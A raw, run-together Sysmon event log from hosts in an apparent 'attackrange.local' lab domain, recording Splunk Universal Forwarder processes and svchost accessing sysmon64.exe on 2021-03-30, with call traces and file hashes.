Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245221Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:21.078{CB4067E1-512C-6063-9C22-00000000AF01}35523644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060653Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:22.609{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DF644A822F5882C3FAC5547905E6269,SHA256=3C39E839B66D51FAE367D04B7BFFEF1E1380FE5872AC6A99AAED37B905CF5679,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245263Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-512E-6063-9F22-00000000AF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245262Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245261Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245260Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245259Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245258Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245257Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245256Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245255Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245254Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245253Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-512E-6063-9F22-00000000AF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245252Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-512E-6063-9F22-00000000AF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245251Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.953{CB4067E1-512E-6063-9F22-00000000AF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245250Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.406{CB4067E1-512E-6063-9E22-00000000AF01}33121440C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245249Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-512E-6063-9E22-00000000AF01}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245248Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245247Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245246Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245245Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245244Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245243Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245242Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245241Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245240Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245239Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-512E-6063-9E22-00000000AF01}3312C:\Program 